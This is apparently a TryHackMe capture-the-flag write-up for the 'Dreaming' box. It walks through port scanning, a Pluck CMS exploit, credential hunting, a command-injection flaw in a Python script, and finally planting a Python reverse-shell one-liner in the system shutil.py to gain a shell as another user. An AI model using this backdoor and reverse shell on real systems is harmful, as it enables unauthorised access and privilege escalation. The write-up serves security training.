Dreaming

Lab Setup

mkdir ~/Documents/TryHackMe/dreaming
cd ~/Documents/TryHackMe/dreaming
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}


export IP=10.10.224.75
export URL=http://$IP

Enumeration

First let's scan the machine for open ports. I usually do this with nmap You need to run this command as root.

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

This will take a while so I use rustscan to make a quick scan.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

There is not so much open ports so let's enumerate the HTTP port. It is the default page of apache2 framework. I use feroxbuster tool for fuzzing, and I found an interesting directory.

Exploitation

In /app I found the main website folder /pluck-4.7.13. If you search on exploit-db you will find an exploit to get a shell.

Next step is to enumerate this machine and get access as a user. In /opt I found 2 interesting files -> getDreams.py and test.py where I found the password for lucien

In the home directory you will find the first flag.

When I login as a user with a password first thing I use sudo -l command to see if that user can run commands as root.

It seems that when I run the script in home directory of death user it will print out a name and for each name a desire. I remember that I see this file name in /opt, so I can see the code behind this output.

In this script it is a issue. Selects the dreamer and dream columns and will execute the query.

# Construct the MySQL query to fetch dreamer and dream columns from dreams table
query = "SELECT dreamer, dream FROM dreams;"

# Execute the query
cursor.execute(query)

.....

for dream_info in dreams_info:
                dreamer, dream = dream_info
                command = f"echo {dreamer} + {dream}"
                shell = subprocess.check_output(command, text=True, shell=True)
                print(shell)

So we need to put a backdoor in database and execute the python code and we will obtain a shell as death

The password for database is not the same as ssh connection. After a lot of enumeration I found the password in .bash_history file.

In home directory of death user you can get the second flag.

After a lot of enumeration I need some help to get the next flag. I see in the home directory of morpheus user a python code that imports copy2 from shutil module. Finally I see that the death user can edit /usr/lib/python3.8/shutil.py file.

find / -group death -type f 2>/dev/null

Put a backdoor in this file and get a reverse shell.

nano /usr/lib/python3.8/shutil.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.113.25",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

Open a listener and you will get a shell. In the home directory of morpheus you will found the flag.

PreviousStarter NextColddBox: Easy

Last updated 1 year ago